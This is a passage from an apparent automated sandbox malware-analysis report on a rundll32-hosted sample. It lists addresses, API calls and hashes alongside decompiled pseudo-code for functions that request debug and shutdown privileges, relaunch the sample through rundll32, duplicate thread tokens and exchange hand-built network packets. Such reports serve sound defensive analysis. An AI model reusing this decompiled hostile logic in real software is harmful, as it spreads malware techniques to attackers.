                                                                                                                                                              0x04e27bca
                                                                                                                                                              0x04e27bd6
                                                                                                                                                              0x04e27bd9
                                                                                                                                                              0x04e27bd9
                                                                                                                                                              0x04e27baf
                                                                                                                                                              0x04e27beb
                                                                                                                                                              0x04e27bf1
                                                                                                                                                              0x04e27bf6
                                                                                                                                                              0x04e27bf7
                                                                                                                                                              0x04e27c00
                                                                                                                                                              0x04e27c0e
                                                                                                                                                              0x04e27c16
                                                                                                                                                              0x04e27c28
                                                                                                                                                              0x04e27c30
                                                                                                                                                              0x04e27c43
                                                                                                                                                              0x04e27c4b
                                                                                                                                                              0x04e27c6b
                                                                                                                                                              0x04e27c76
                                                                                                                                                              0x04e27c77
                                                                                                                                                              0x04e27c7c
                                                                                                                                                              0x04e27c7c
                                                                                                                                                              0x04e27c7e
                                                                                                                                                              0x04e27c7f
                                                                                                                                                              0x04e27c7f
                                                                                                                                                              0x04e27c84
                                                                                                                                                              0x04e27c85
                                                                                                                                                              0x04e27c87
                                                                                                                                                              0x04e27c8a
                                                                                                                                                              0x04e27c8a
                                                                                                                                                              0x04e27c8c
                                                                                                                                                              0x04e27c8d
                                                                                                                                                              0x04e27c8d
                                                                                                                                                              0x04e27cb0
                                                                                                                                                              0x04e27cb3
                                                                                                                                                              0x04e27cba
                                                                                                                                                              0x04e27cba
                                                                                                                                                              0x04e27c4b
                                                                                                                                                              0x04e27c30
                                                                                                                                                              0x04e27cc2

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E27897: GetTickCount.KERNEL32 ref: 04E278AF
                                                                                                                                                                • Part of subcall function 04E27897: srand.MSVCRT ref: 04E278B2
                                                                                                                                                                • Part of subcall function 04E27897: GetTickCount.KERNEL32 ref: 04E278B9
                                                                                                                                                                • Part of subcall function 04E27897: GetModuleFileNameW.KERNEL32(04E37BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E27926
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 04E27A07
                                                                                                                                                                • Part of subcall function 04E2923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04E279FC,?,?,?), ref: 04E2927B
                                                                                                                                                                • Part of subcall function 04E2923F: memcpy.MSVCRT ref: 04E29294
                                                                                                                                                                • Part of subcall function 04E2923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04E29303
                                                                                                                                                                • Part of subcall function 04E2923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 04E29323
                                                                                                                                                              • WSAStartup.WS2_32(00000202,04E381E0), ref: 04E27A3D
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(04E37B9C,00000008,04E267F9,04E2682F,000000FF,00000024,04E26AA8,00000000,0000FFFF), ref: 04E27A80
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 04E27AAD
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04E28A6F,00000000,00000000,00000000), ref: 04E27AC6
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04E277D1,00000000,00000000,00000000), ref: 04E27ADF
                                                                                                                                                                • Part of subcall function 04E27E8E: PathFileExistsW.KERNELBASE(?,?), ref: 04E27EB1
                                                                                                                                                                • Part of subcall function 04E27E8E: GetCurrentProcess.KERNEL32(?,?), ref: 04E27EC3
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04E2A1A9,00000000,00000000,00000000), ref: 04E27B78
                                                                                                                                                                • Part of subcall function 04E2A420: GetProcessHeap.KERNEL32(00000008,00000004,746543E0,?,00000000,?,?,04E27B89,000000FF), ref: 04E2A436
                                                                                                                                                                • Part of subcall function 04E2A420: HeapAlloc.KERNEL32(00000000,?,?,04E27B89,000000FF), ref: 04E2A439
                                                                                                                                                                • Part of subcall function 04E2A420: CreateThread.KERNELBASE ref: 04E2A454
                                                                                                                                                                • Part of subcall function 04E2A420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04E27B89,000000FF), ref: 04E2A463
                                                                                                                                                                • Part of subcall function 04E2A420: HeapFree.KERNEL32(00000000,?,?,04E27B89,000000FF), ref: 04E2A466
                                                                                                                                                              • Sleep.KERNELBASE(?,000000FF), ref: 04E27B93
                                                                                                                                                              • Sleep.KERNELBASE(?), ref: 04E27BEB
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04E27C0E
                                                                                                                                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04E27C28
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(04E37BC8,0000030C), ref: 04E27C43
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(04E37BC8,?), ref: 04E27C51
                                                                                                                                                              • wsprintfW.USER32 ref: 04E27C6B
                                                                                                                                                              • CreateProcessW.KERNEL32 ref: 04E27CB3
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 04E27CBA
                                                                                                                                                                • Part of subcall function 04E2554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04E25561
                                                                                                                                                                • Part of subcall function 04E2554A: GetLastError.KERNEL32(?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E2556B
                                                                                                                                                                • Part of subcall function 04E2554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E25581
                                                                                                                                                                • Part of subcall function 04E2554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E2558E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcess$FileHeapThread$CryptNameVirtual$AllocContextCountExitFreeModulePathSleepTick$AcquireCriticalCurrentDirectoryErrorEventExistsFindInitializeLastProtectRandomReleaseSectionStartupSystemlstrcatmemcpysrandwsprintf
                                                                                                                                                              • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                                                                              • API String ID: 1016975789-3730106045
                                                                                                                                                              • Opcode ID: 25b945a7ce9ae1fea231e5b268617ad9782956695c90b74763cee0010d42102d
                                                                                                                                                              • Instruction ID: f1f2ed4b4fcd6156629959482c7614c5b3f7f18cc2d06608e37c0efba345e772
                                                                                                                                                              • Opcode Fuzzy Hash: 25b945a7ce9ae1fea231e5b268617ad9782956695c90b74763cee0010d42102d
                                                                                                                                                              • Instruction Fuzzy Hash: 8281E8B150026DBFFB11AFB1DE89EAE7BBDEF05309F049565FA01A2045CA75AD40CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E04E221DC(intOrPtr _a4, void** _a8, void* _a12) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				void* _t42;
                                                                                                                                                              				short _t44;
                                                                                                                                                              				void* _t47;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				signed int _t57;
                                                                                                                                                              				signed int _t60;
                                                                                                                                                              				void* _t66;
                                                                                                                                                              				void* _t74;
                                                                                                                                                              				void* _t77;
                                                                                                                                                              				void* _t79;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t35 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v12 = _t35;
                                                                                                                                                              				if(_t35 == 0) {
                                                                                                                                                              					L13:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t66 = HeapAlloc(GetProcessHeap(), 8, 0x2d);
                                                                                                                                                              				_v16 = _t66;
                                                                                                                                                              				if(_t66 == 0) {
                                                                                                                                                              					L12:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				_t57 = 9;
                                                                                                                                                              				_t42 = memcpy(_t66,  *_a8, _t57 << 2);
                                                                                                                                                              				__imp__#9(0x29);
                                                                                                                                                              				_t77 = _v16;
                                                                                                                                                              				 *(_t77 + 2) = _t42;
                                                                                                                                                              				_t44 =  *_a12;
                                                                                                                                                              				 *((char*)(_t77 + 8)) = 4;
                                                                                                                                                              				 *((char*)(_t77 + 0x24)) = 3;
                                                                                                                                                              				 *((short*)(_t77 + 0x25)) = _t44;
                                                                                                                                                              				__imp__#19(_a4, _t77, 0x2d, 0); // executed
                                                                                                                                                              				if(_t44 > 0) {
                                                                                                                                                              					__imp__#16(_a4, _v12, 0xffff, 0); // executed
                                                                                                                                                              					if(_t44 > 0) {
                                                                                                                                                              						_t47 = _v12;
                                                                                                                                                              						if( *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                                                                              							 *_a12 = 0;
                                                                                                                                                              							memset(_t47, 0, 0xffff);
                                                                                                                                                              							_t50 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                              							_a12 = _t50;
                                                                                                                                                              							if(_t50 != 0) {
                                                                                                                                                              								_t60 = 9;
                                                                                                                                                              								_t51 = memcpy(_t50,  *_a8, _t60 << 2);
                                                                                                                                                              								__imp__#9(0x23);
                                                                                                                                                              								_t79 = _a12;
                                                                                                                                                              								 *(_t79 + 2) = _t51;
                                                                                                                                                              								 *((char*)(_t79 + 8)) = 0x71;
                                                                                                                                                              								__imp__#19(_a4, _t79, 0x27, 0); // executed
                                                                                                                                                              								if(_t51 > 0) {
                                                                                                                                                              									_t74 = _v12;
                                                                                                                                                              									__imp__#16(_a4, _t74, 0xffff, 0);
                                                                                                                                                              									if(_t51 > 0 &&  *((intOrPtr*)(_t74 + 9)) == 0) {
                                                                                                                                                              										 *((short*)( *_a8 + 0x1c)) = 0;
                                                                                                                                                              										_v5 = 1;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								HeapFree(GetProcessHeap(), 8, _t79);
                                                                                                                                                              								_t77 = _v16;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t77);
                                                                                                                                                              				goto L12;
                                                                                                                                                              			}


















                                                                                                                                                              0x04e221f1
                                                                                                                                                              0x04e221fe
                                                                                                                                                              0x04e22200
                                                                                                                                                              0x04e22205
                                                                                                                                                              0x04e2233b
                                                                                                                                                              0x04e22341
                                                                                                                                                              0x04e22341
                                                                                                                                                              0x04e22215
                                                                                                                                                              0x04e22217
                                                                                                                                                              0x04e2221c
                                                                                                                                                              0x04e2232c
                                                                                                                                                              0x04e22334
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2233a
                                                                                                                                                              0x04e22229
                                                                                                                                                              0x04e2222c
                                                                                                                                                              0x04e2222e
                                                                                                                                                              0x04e22234
                                                                                                                                                              0x04e2223b
                                                                                                                                                              0x04e22242
                                                                                                                                                              0x04e22249
                                                                                                                                                              0x04e2224d
                                                                                                                                                              0x04e22251
                                                                                                                                                              0x04e22255
                                                                                                                                                              0x04e2225d
                                                                                                                                                              0x04e22271
                                                                                                                                                              0x04e22279
                                                                                                                                                              0x04e2227f
                                                                                                                                                              0x04e22286
                                                                                                                                                              0x04e22294
                                                                                                                                                              0x04e22297
                                                                                                                                                              0x04e222a6
                                                                                                                                                              0x04e222ac
                                                                                                                                                              0x04e222b1
                                                                                                                                                              0x04e222ba
                                                                                                                                                              0x04e222bf
                                                                                                                                                              0x04e222c1
                                                                                                                                                              0x04e222c7
                                                                                                                                                              0x04e222d2
                                                                                                                                                              0x04e222d6
                                                                                                                                                              0x04e222da
                                                                                                                                                              0x04e222e2
                                                                                                                                                              0x04e222e4
                                                                                                                                                              0x04e222f2
                                                                                                                                                              0x04e222fa
                                                                                                                                                              0x04e22309
                                                                                                                                                              0x04e2230d
                                                                                                                                                              0x04e2230d
                                                                                                                                                              0x04e222fa
                                                                                                                                                              0x04e22317
                                                                                                                                                              0x04e2231d
                                                                                                                                                              0x04e2231d
                                                                                                                                                              0x04e222b1
                                                                                                                                                              0x04e22286
                                                                                                                                                              0x04e22279
                                                                                                                                                              0x04e22326
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,74654F20,?,?,?,?,?,?,?,?), ref: 04E221F5
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E221FE
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 04E22210
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E22213
                                                                                                                                                              • htons.WS2_32(00000029), ref: 04E2222E
                                                                                                                                                              • send.WS2_32(?,?,0000002D,00000000), ref: 04E22255
                                                                                                                                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E22271
                                                                                                                                                              • memset.MSVCRT ref: 04E22297
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04E222A3
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E222A6
                                                                                                                                                              • htons.WS2_32(00000023), ref: 04E222C1
                                                                                                                                                              • send.WS2_32(?,?,00000027,00000000), ref: 04E222DA
                                                                                                                                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04E222F2
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E22314
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E22317
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E22323
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E22326
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E22331
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E22334
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 821554539-0
                                                                                                                                                              • Opcode ID: 6e6de92b495738ba1b8b407374a7142a8f513f1b26f2892f42dab0eb6ae72ccc
                                                                                                                                                              • Instruction ID: 703866325cffec4fb48cc39ff67cdbf4522b7c4b3ac2672f1c01f866fe7aa6d5
                                                                                                                                                              • Opcode Fuzzy Hash: 6e6de92b495738ba1b8b407374a7142a8f513f1b26f2892f42dab0eb6ae72ccc
                                                                                                                                                              • Instruction Fuzzy Hash: 25416D31A0030ABFEB209FA5DD09FAF7BA4EF49755F048455FA44AB280D6B9E904CB51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 328 4e2a1a9-4e2a1c7 329 4e2a1d0-4e2a1fa GetProcessHeap HeapAlloc 328->329 330 4e2a1c9-4e2a1cb call 4e2a016 328->330 332 4e2a200-4e2a213 GetProcessHeap HeapAlloc 329->332 333 4e2a32a-4e2a330 329->333 330->329 332->333 334 4e2a219-4e2a229 call 4e26b0e 332->334 334->333 337 4e2a22f-4e2a235 334->337 338 4e2a245-4e2a24c 337->338 339 4e2a271 338->339 340 4e2a24e-4e2a260 CreateThread 338->340 343 4e2a275 339->343 341 4e2a322-4e2a325 call 4e26b46 340->341 342 4e2a266-4e2a26f 340->342 341->333 342->343 344 4e2a277-4e2a27b 343->344 346 4e2a286-4e2a2af GetModuleHandleA GetProcAddress 344->346 347 4e2a27d-4e2a284 344->347 346->341 349 4e2a2b1-4e2a2b6 346->349 347->344 347->346 350 4e2a2d3-4e2a2d6 349->350 351 4e2a2b8-4e2a2be 349->351 353 4e2a2ea-4e2a2f7 GetProcessHeap HeapAlloc 350->353 354 4e2a2d8-4e2a2e7 CloseHandle 350->354 352 4e2a2c0-4e2a2c5 351->352 356 4e2a2c7-4e2a2ca 352->356 357 4e2a2ce-4e2a2d1 352->357 353->341 355 4e2a2f9-4e2a30c GetProcessHeap HeapAlloc 353->355 354->353 355->341 358 4e2a30e-4e2a31c call 4e26ad0 355->358 356->352 359 4e2a2cc 356->359 357->353 358->341 362 4e2a237-4e2a243 358->362 359->353 362->338
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E04E2A1A9() {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				void _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				void* _v48;
                                                                                                                                                              				signed int _v52;
                                                                                                                                                              				signed int _t46;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                              				signed int _t55;
                                                                                                                                                              				_Unknown_base(*)()* _t57;
                                                                                                                                                              				signed int _t58;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				signed int _t67;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t75;
                                                                                                                                                              				signed int _t78;
                                                                                                                                                              				void* _t82;
                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t84;
                                                                                                                                                              				void** _t86;
                                                                                                                                                              				void* _t92;
                                                                                                                                                              
                                                                                                                                                              				_v24 =  *0x4e37bb8;
                                                                                                                                                              				_t46 =  !( *0x4e37bc0 >> 2) & 0x00000001;
                                                                                                                                                              				_v20 = _t46;
                                                                                                                                                              				if(_t46 != 0) {
                                                                                                                                                              					_push(0); // executed
                                                                                                                                                              					E04E2A016(); // executed
                                                                                                                                                              				}
                                                                                                                                                              				_v52 = _v52 & 0x00000000;
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                              				if(_t82 == 0) {
                                                                                                                                                              					L27:
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					 *_t82 = _v20;
                                                                                                                                                              					_t53 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                                                                              					 *(_t82 + 4) = _t53;
                                                                                                                                                              					_t95 = _t53;
                                                                                                                                                              					if(_t53 == 0) {
                                                                                                                                                              						goto L27;
                                                                                                                                                              					}
                                                                                                                                                              					_t54 = E04E26B0E(_v24, _t95, _t53);
                                                                                                                                                              					_t75 = 0;
                                                                                                                                                              					_v28 = _t54;
                                                                                                                                                              					if(_t54 == 0) {
                                                                                                                                                              						goto L27;
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_v16 = 0;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_v12 = _t75;
                                                                                                                                                              						if(_v8 == 6) {
                                                                                                                                                              							goto L10;
                                                                                                                                                              						}
                                                                                                                                                              						_t65 = CreateThread(_t75, _t75, E04E2A112, _t82, _t75, _t75); // executed
                                                                                                                                                              						if(_t65 == 0) {
                                                                                                                                                              							L26:
                                                                                                                                                              							E04E26B46(_v28);
                                                                                                                                                              							goto L27;
                                                                                                                                                              						}
                                                                                                                                                              						 *(_t92 + _v8 * 4 - 0x30) = _t65;
                                                                                                                                                              						_t75 = 0;
                                                                                                                                                              						L11:
                                                                                                                                                              						_t55 = 0;
                                                                                                                                                              						while( *((intOrPtr*)(_t92 + _t55 * 4 - 0x30)) != _t75) {
                                                                                                                                                              							_v12 =  &(_v12->nLength);
                                                                                                                                                              							_t55 = _t55 + 1;
                                                                                                                                                              							if(_t55 != 6) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t57 = GetProcAddress(GetModuleHandleA("kernel32"), "WaitForMultipleObjects");
                                                                                                                                                              						_t84 = _v12;
                                                                                                                                                              						_t58 =  *_t57(_t84,  &_v52, 0, _v16);
                                                                                                                                                              						if(_t58 == 0xffffffff) {
                                                                                                                                                              							goto L26;
                                                                                                                                                              						}
                                                                                                                                                              						if(_t58 != 0x102) {
                                                                                                                                                              							__eflags = _t58 - _t84 - 1;
                                                                                                                                                              							if(_t58 <= _t84 - 1) {
                                                                                                                                                              								_t86 = _t92 + _t58 * 4 - 0x30;
                                                                                                                                                              								_v8 = _t58;
                                                                                                                                                              								CloseHandle( *_t86);
                                                                                                                                                              								 *_t86 =  *_t86 & 0x00000000;
                                                                                                                                                              								__eflags =  *_t86;
                                                                                                                                                              							}
                                                                                                                                                              							L23:
                                                                                                                                                              							_t82 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                              							if(_t82 == 0) {
                                                                                                                                                              								goto L26;
                                                                                                                                                              							}
                                                                                                                                                              							_t63 = HeapAlloc(GetProcessHeap(), 8, 0x21);
                                                                                                                                                              							_t77 = _v20;
                                                                                                                                                              							 *(_t82 + 4) = _t63;
                                                                                                                                                              							 *_t82 = _v20;
                                                                                                                                                              							if(_t63 == 0 || E04E26AD0(_t77, _t63) == 0) {
                                                                                                                                                              								goto L26;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t75 = 0;
                                                                                                                                                              								__eflags = 0;
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t78 = 6;
                                                                                                                                                              						_v8 = _t78;
                                                                                                                                                              						_t67 = 0;
                                                                                                                                                              						while( *((intOrPtr*)(_t92 + _t67 * 4 - 0x30)) != 0) {
                                                                                                                                                              							_t67 = _t67 + 1;
                                                                                                                                                              							if(_t67 != _t78) {
                                                                                                                                                              								continue;
                                                                                                                                                              							}
                                                                                                                                                              							goto L23;
                                                                                                                                                              						}
                                                                                                                                                              						_v8 = _t67;
                                                                                                                                                              						goto L23;
                                                                                                                                                              						L10:
                                                                                                                                                              						_t18 =  &_v16;
                                                                                                                                                              						 *_t18 = _v16 | 0xffffffff;
                                                                                                                                                              						__eflags =  *_t18;
                                                                                                                                                              						goto L11;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}


























                                                                                                                                                              0x04e2a1b4
                                                                                                                                                              0x04e2a1c1
                                                                                                                                                              0x04e2a1c4
                                                                                                                                                              0x04e2a1c7
                                                                                                                                                              0x04e2a1c9
                                                                                                                                                              0x04e2a1cb
                                                                                                                                                              0x04e2a1cb
                                                                                                                                                              0x04e2a1d0
                                                                                                                                                              0x04e2a1e2
                                                                                                                                                              0x04e2a1e3
                                                                                                                                                              0x04e2a1e4
                                                                                                                                                              0x04e2a1e5
                                                                                                                                                              0x04e2a1ea
                                                                                                                                                              0x04e2a1f6
                                                                                                                                                              0x04e2a1fa
                                                                                                                                                              0x04e2a32a
                                                                                                                                                              0x04e2a330
                                                                                                                                                              0x04e2a200
                                                                                                                                                              0x04e2a207
                                                                                                                                                              0x04e2a20c
                                                                                                                                                              0x04e2a20e
                                                                                                                                                              0x04e2a211
                                                                                                                                                              0x04e2a213
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a21d
                                                                                                                                                              0x04e2a222
                                                                                                                                                              0x04e2a224
                                                                                                                                                              0x04e2a229
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a22f
                                                                                                                                                              0x04e2a232
                                                                                                                                                              0x04e2a245
                                                                                                                                                              0x04e2a249
                                                                                                                                                              0x04e2a24c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a258
                                                                                                                                                              0x04e2a260
                                                                                                                                                              0x04e2a322
                                                                                                                                                              0x04e2a325
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a325
                                                                                                                                                              0x04e2a269
                                                                                                                                                              0x04e2a26d
                                                                                                                                                              0x04e2a275
                                                                                                                                                              0x04e2a275
                                                                                                                                                              0x04e2a277
                                                                                                                                                              0x04e2a27d
                                                                                                                                                              0x04e2a280
                                                                                                                                                              0x04e2a284
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a284
                                                                                                                                                              0x04e2a297
                                                                                                                                                              0x04e2a2a0
                                                                                                                                                              0x04e2a2aa
                                                                                                                                                              0x04e2a2af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a2b6
                                                                                                                                                              0x04e2a2d4
                                                                                                                                                              0x04e2a2d6
                                                                                                                                                              0x04e2a2d8
                                                                                                                                                              0x04e2a2de
                                                                                                                                                              0x04e2a2e1
                                                                                                                                                              0x04e2a2e7
                                                                                                                                                              0x04e2a2e7
                                                                                                                                                              0x04e2a2e7
                                                                                                                                                              0x04e2a2ea
                                                                                                                                                              0x04e2a2f3
                                                                                                                                                              0x04e2a2f7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a300
                                                                                                                                                              0x04e2a302
                                                                                                                                                              0x04e2a305
                                                                                                                                                              0x04e2a308
                                                                                                                                                              0x04e2a30c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a237
                                                                                                                                                              0x04e2a243
                                                                                                                                                              0x04e2a243
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a243
                                                                                                                                                              0x04e2a30c
                                                                                                                                                              0x04e2a2ba
                                                                                                                                                              0x04e2a2bb
                                                                                                                                                              0x04e2a2be
                                                                                                                                                              0x04e2a2c0
                                                                                                                                                              0x04e2a2c7
                                                                                                                                                              0x04e2a2ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a2cc
                                                                                                                                                              0x04e2a2ce
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a271
                                                                                                                                                              0x04e2a271
                                                                                                                                                              0x04e2a271
                                                                                                                                                              0x04e2a271
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a271
                                                                                                                                                              0x04e2a245

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04E2A1EB
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2A1F4
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04E2A209
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2A20C
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04E2A112,00000000,00000000,00000000), ref: 04E2A258
                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,WaitForMultipleObjects,00000000), ref: 04E2A290
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04E2A297
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04E2A2E1
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 04E2A2EE
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2A2F1
                                                                                                                                                                • Part of subcall function 04E2A016: GetCurrentThread.KERNEL32 ref: 04E2A035
                                                                                                                                                                • Part of subcall function 04E2A016: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04E2A1D0,00000000), ref: 04E2A03C
                                                                                                                                                                • Part of subcall function 04E2A016: DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 04E2A059
                                                                                                                                                                • Part of subcall function 04E2A016: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04E2A0F5
